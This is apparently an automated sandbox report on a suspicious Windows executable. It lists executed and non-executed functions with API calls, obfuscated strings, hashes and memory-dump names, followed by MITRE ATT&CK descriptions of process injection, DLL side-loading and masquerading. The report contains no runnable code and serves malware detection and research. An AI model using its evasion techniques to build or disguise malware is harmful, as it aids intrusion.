API String ID: 4159173863-0
Opcode ID: 8854b8bbace8555cc0f419f014975356daebfdb9637a94b94a70e4625fe11a51
Instruction ID: 37e889f167100b587a02f92b955e498922163858d7d7aab38356b1d4f56091a8
Opcode Fuzzy Hash: 8854b8bbace8555cc0f419f014975356daebfdb9637a94b94a70e4625fe11a51
Instruction Fuzzy Hash: 3401D474640308ABC760EB64EC45BDA7BB8E71C319F01416AF70997290DE349D88CBA9

Function 00405B50 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00405B5C

Part of subcall function 0040358A: __getptd_noexit.LIBCMT ref: 0040358D
Part of subcall function 0040358A: __amsg_exit.LIBCMT ref: 0040359A

__getptd.LIBCMT ref: 00405B73
__amsg_exit.LIBCMT ref: 00405B81
__lock.LIBCMT ref: 00405B91

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 9b9d6a13feb519881675422f27fd5dda9ba886e3a5a69f4c1691289f93b848f8
Instruction ID: 552e8b1d8a98d21b991217d94812f4f783b0b0706fbbf1442b474227e8c06dbd
Opcode Fuzzy Hash: 9b9d6a13feb519881675422f27fd5dda9ba886e3a5a69f4c1691289f93b848f8
Instruction Fuzzy Hash: C2F06231A01B009AD620BB668806BAA73B0EB00724F10413FE840B72D1CBBCB901DE5E

Function 00407C29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__calloc_crt.LIBCMT ref: 00407C4B
__calloc_crt.LIBCMT ref: 00407C64

Strings

@.Q, xrefs: 00407C7B

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: __calloc_crt
String ID: @.Q
API String ID: 3494438863-2561686684
Opcode ID: d191732e1c4f999118ae73ad3d6cb9ca27644a56187a4761f745d30067acc614
Instruction ID: 3abb8ef269fb54cc31cb530c16d7acece676a1df543f4bc4756426e38cd875f9
Opcode Fuzzy Hash: d191732e1c4f999118ae73ad3d6cb9ca27644a56187a4761f745d30067acc614
Instruction Fuzzy Hash: 36112771B0C61157F3284B2DBC106E5279AE798724B24823FE601EB3D0EB7CEC81468D

Function 00416BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00512CE8), ref: 00416CAF
GetProcAddress.KERNEL32(00000000,0041D210), ref: 00416CEC

Strings

, xrefs: 00416C15

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-3916222277
Opcode ID: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
Instruction ID: d8462089c25fc9d344aee2fc6fb1be1e63980dafba0cd980b71d8e6a5f25c2b5
Opcode Fuzzy Hash: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
Instruction Fuzzy Hash: C331285095C380D9E301CBB8FC047853F61AB39708F04C1A89658873B5D7BE9A69D7AE

Analysis Process: wideaecPID: 1272, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1395
Total number of Limit Nodes:	0

Executed Functions

Function 00401734 Relevance: 21.1, APIs: 14, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 0040177F
__mtinit.LIBCMT ref: 00401785
_fast_error_exit.LIBCMT ref: 00401790
__RTC_Initialize.LIBCMT ref: 00401796
__ioinit.LIBCMT ref: 0040179E
__amsg_exit.LIBCMT ref: 004017A9
GetCommandLineW.KERNEL32 ref: 004017AF
__wsetargv.LIBCMT ref: 004017C3
__amsg_exit.LIBCMT ref: 004017CE
__wsetenvp.LIBCMT ref: 004017D4
__amsg_exit.LIBCMT ref: 004017DF
__cinit.LIBCMT ref: 004017E6
__amsg_exit.LIBCMT ref: 004017F1
__wwincmdln.LIBCMT ref: 004017F7

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
String ID:
API String ID: 2477803136-0
Opcode ID: 287b2ba1be834a2d5081bfe1d4c2595d0c18faf5a576ef3c029249bf642c26b8
Instruction ID: 1ddf2cd531eec152a9fcae4ce62b7a222f7f1f098f12d72469ebe43987e19914
Opcode Fuzzy Hash: 287b2ba1be834a2d5081bfe1d4c2595d0c18faf5a576ef3c029249bf642c26b8
Instruction Fuzzy Hash: AE2192B09003059AEB147BB3A886BAE3264AF0074CF14443FF545BB5F2EB7C8980975D

Function 0040299C Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004029B1

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 82a3ce63483adf37cabcd1f939d0096d7177a00d7d7292b2bc497fdd817d45e1
Instruction ID: 0f9cce50ebc2d21aa67104eb30b8857fff835c89720ca9b263f404ff36a43163
Opcode Fuzzy Hash: 82a3ce63483adf37cabcd1f939d0096d7177a00d7d7292b2bc497fdd817d45e1
Instruction Fuzzy Hash: 96D05E72A543099ADB005F756C097A63BECE388395F10C43ABD0CC65D0F674D550DA44

Non-executed Functions

Function 004167C0 Relevance: 80.8, APIs: 40, Strings: 6, Instructions: 299
windowtimefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00416822
WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 0041686D
DeleteVolumeMountPointW.KERNEL32(00000000), ref: 004168B7
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004168DA
GetFocus.USER32 ref: 004168E0
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004168ED
FindAtomW.KERNEL32(00000000), ref: 004168F4
SetConsoleMode.KERNEL32(00000000,00000000), ref: 004168FC
_memset.LIBCMT ref: 00416912
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00416923
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041692C
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00416942
GetEnvironmentStringsW.KERNEL32 ref: 00416948
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041698D
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041699C
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004169A5
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004169BA
ReleaseMutex.KERNEL32(00000000), ref: 004169CA
SetCommState.KERNEL32(00000000,00000000), ref: 004169F4
GetLastError.KERNEL32 ref: 004169F6
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00416A25
GetComputerNameW.KERNEL32(?,?), ref: 00416A39
GetFileAttributesA.KERNEL32(00000000), ref: 00416A40
GetConsoleAliasExesLengthA.KERNEL32 ref: 00416A46
GetBinaryTypeA.KERNEL32(sutelizunosisibure,?), ref: 00416A58
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00416A6B
GetLongPathNameW.KERNEL32(tekeragej,?,00000000), ref: 00416A7E
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00416A86
_calloc.LIBCMT ref: 00416A8E
_realloc.LIBCMT ref: 00416A95
_malloc.LIBCMT ref: 00416A9B
_calloc.LIBCMT ref: 00416AA2
_calloc.LIBCMT ref: 00416AAE
_malloc.LIBCMT ref: 00416AB4
LoadLibraryW.KERNEL32(gavosebisiv), ref: 00416B12

Strings

gavosebisiv, xrefs: 00416B0D
tekeragej, xrefs: 00416A79
wumefalijocenor, xrefs: 00416BA2
sutelizunosisibure, xrefs: 00416A53
}$, xrefs: 00416B71
k`, xrefs: 00416B4D

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: Console$CommFileName_calloc$LengthOutputReadVolume_malloc$AdjustmentAlarmAliasAliasesAtomAttributeAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultDeleteEnvironmentErrorExchangeExesFindFocusFormatInformationInterlockedLastLibraryLoadLongMessageModeModuleMountMutexObjectPathPipePointPrivilegeReleaseStateStringsSystemTimeTimeoutsTypeWrite_memset_realloc
String ID: gavosebisiv$k`$sutelizunosisibure$tekeragej$wumefalijocenor$}$
API String ID: 2926064888-770840792
Opcode ID: b83e9ab29cf5346ce2fc535f0d494ce7507c83c62c4cb789c664dfa5c778e51b
Instruction ID: 66b7ba66da8bb5d3bd80010fb135f4a1ed8397abbfee7ed1f5eca20cf58200d5
Opcode Fuzzy Hash: b83e9ab29cf5346ce2fc535f0d494ce7507c83c62c4cb789c664dfa5c778e51b
Instruction Fuzzy Hash: 6DA1D571846624ABC720EB61DC45BDF7B78EF4D314F0180AAF609A3161DB385A85CBED

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00401947
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040195C
UnhandledExceptionFilter.KERNEL32(00417210), ref: 00401967
GetCurrentProcess.KERNEL32(C0000409), ref: 00401983
TerminateProcess.KERNEL32(00000000), ref: 0040198A

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: fbf6958955816082be7985e6f7221accade19c9c4b653433cb5057aae2085619
Instruction ID: 518fd11cacdafce49b09c12dc58e9f9886273de46f09145c7865e5e2ac2e4de0
Opcode Fuzzy Hash: fbf6958955816082be7985e6f7221accade19c9c4b653433cb5057aae2085619
Instruction Fuzzy Hash: 2C21B9B49013089FC701EF69ED44AC43BB8FB88754F10C07AE528973A1E7B45A858F9D

Function 00416AE6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 68
librarymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(gavosebisiv), ref: 00416B12
LocalAlloc.KERNEL32(00000000,00000000), ref: 00416B3D
GetStdHandle.KERNEL32(00000000), ref: 00416B41
MoveFileA.KERNEL32(00000000,00000000), ref: 00416B47
InterlockedDecrement.KERNEL32(?), ref: 00416B6A
GetFileAttributesW.KERNEL32(wumefalijocenor), ref: 00416BA7

Strings

gavosebisiv, xrefs: 00416B0D
wumefalijocenor, xrefs: 00416BA2
}$, xrefs: 00416B71
k`, xrefs: 00416B4D

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: File$AllocAttributesDecrementHandleInterlockedLibraryLoadLocalMove
String ID: gavosebisiv$k`$wumefalijocenor$}$
API String ID: 1531786347-1394638211
Opcode ID: d27b80976939796ba1abbc43a9ef96ccebe2e0ce66cd2bea3f527acc7efc2efd
Instruction ID: 42061d5068bdce50c1bf5091c343343de5c0ff0e781990f509a1e5bc66fdcea5
Opcode Fuzzy Hash: d27b80976939796ba1abbc43a9ef96ccebe2e0ce66cd2bea3f527acc7efc2efd
Instruction Fuzzy Hash: AB2126349882208BCB20DB60DC457DABB60FB48319F1244BFEA49D7290CA38ADC4C79D

Function 004053E4 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 004053F0

Part of subcall function 0040358A: __getptd_noexit.LIBCMT ref: 0040358D
Part of subcall function 0040358A: __amsg_exit.LIBCMT ref: 0040359A

__amsg_exit.LIBCMT ref: 00405410
__lock.LIBCMT ref: 00405420
InterlockedDecrement.KERNEL32(?), ref: 0040543D
InterlockedIncrement.KERNEL32(02372AE0), ref: 00405468

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: d3b170e2e706eb485197b67a249f64a2823a160b330d9f4967bae16a518fd7e9
Instruction ID: 13e159fc2d6b5e5e0d5e71bbc407af5ce5e6bedde81baf6bae67f22f995fa076
Opcode Fuzzy Hash: d3b170e2e706eb485197b67a249f64a2823a160b330d9f4967bae16a518fd7e9
Instruction Fuzzy Hash: 09018E31901A21A7C721BF2598057DB77A0EB40712F15803BE810B36D1C73CA9D2CF9E

Function 00403235 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 00403253

Part of subcall function 00401CB7: __mtinitlocknum.LIBCMT ref: 00401CCD
Part of subcall function 00401CB7: __amsg_exit.LIBCMT ref: 00401CD9
Part of subcall function 00401CB7: EnterCriticalSection.KERNEL32(?,?,?,00401A9E,00000004,004184B8,0000000C,00401029,?,?,00000000), ref: 00401CE1

___sbh_find_block.LIBCMT ref: 0040325E
___sbh_free_block.LIBCMT ref: 0040326D
HeapFree.KERNEL32(00000000,?,004184F8,0000000C,0040357B,00000000,?,0040485B,?,00000001,?,?,00401C41,00000018,004184D8,0000000C), ref: 0040329D
GetLastError.KERNEL32(?,0040485B,?,00000001,?,?,00401C41,00000018,004184D8,0000000C,00401CD2,?,?,?,00401A9E,00000004), ref: 004032AE

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 5b1877f37e300bd531117a34fbc35f3a0a2cf01f076955ad2886deb4d5bd37bd
Instruction ID: ba2c4bf796a4cbb269836eb799744a4a07badc503d0f104c505cb3842fb2dfb0
Opcode Fuzzy Hash: 5b1877f37e300bd531117a34fbc35f3a0a2cf01f076955ad2886deb4d5bd37bd
Instruction Fuzzy Hash: 94018431905305AADB206F729C0AB9E7F68AF01319F20417FF404B61D1DB3C86409A5C

Function 00407E9D Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00407ED1
__isleadbyte_l.LIBCMT ref: 00407F05
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00407F36
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 00407FA4

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f8738d347817c22edc6843a42926aeeac8f4ed4628122f3d4212bb9498313bb7
Instruction ID: b8966ae773c087e91eca33365f61ea6f7067cb5d6d98d3e2728dc54b36560e28
Opcode Fuzzy Hash: f8738d347817c22edc6843a42926aeeac8f4ed4628122f3d4212bb9498313bb7
Instruction Fuzzy Hash: 5731B131E19246AFCB20DF64C8849AE3BB5AF01311B1485BAE465AB2D1D334ED41DB9A

Function 00416720 Relevance: 6.0, APIs: 4, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416754
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041676F
HeapDestroy.KERNEL32(00000000), ref: 0041678E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041679D

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 6f0caa484bac516cc1ad4d948060f28f35a86901e56f3016a6aea5b50e93a844
Instruction ID: bfda60e46cdd917eef3824eff81274299ff88806db2d43078e848f831fad2497
Opcode Fuzzy Hash: 6f0caa484bac516cc1ad4d948060f28f35a86901e56f3016a6aea5b50e93a844
Instruction Fuzzy Hash: B301B1716852049BD710EBA4ED45BDA7B78A70C31AF0040A6F709D62D0DA3499888B6E

Function 00405B50 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00405B5C

Part of subcall function 0040358A: __getptd_noexit.LIBCMT ref: 0040358D
Part of subcall function 0040358A: __amsg_exit.LIBCMT ref: 0040359A

__getptd.LIBCMT ref: 00405B73
__amsg_exit.LIBCMT ref: 00405B81
__lock.LIBCMT ref: 00405B91

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 992d04e0aff105da56c92bad36f86648af83dc261cce24e5f63837c0e0582e7a
Instruction ID: 7adc7e1a2d56d6b71ff7cf5d5673aecae0c80fdf6a7dc008936b88ccaed65405
Opcode Fuzzy Hash: 992d04e0aff105da56c92bad36f86648af83dc261cce24e5f63837c0e0582e7a
Instruction Fuzzy Hash: BFF06231A01B009ED620BB668506B6A73B0EB40724F11853FE840B72D2CBBCB941DE5E

Function 004164D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00511CE8), ref: 004165AF
GetProcAddress.KERNEL32(00000000,0041C210), ref: 004165EC

Strings

, xrefs: 00416515

Memory Dump Source

Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_wideaec.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-3916222277
Opcode ID: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
Instruction ID: 5d6b8529abac6a2ef6dc9a1a277ef6d20b5afcabe6b96dcf33e4d09f3920d241
Opcode Fuzzy Hash: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
Instruction Fuzzy Hash: 00310310AD8781CBE301CBE8FC447813A62AB35748F04C0E89648873B5D7BE5A58D7AE

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
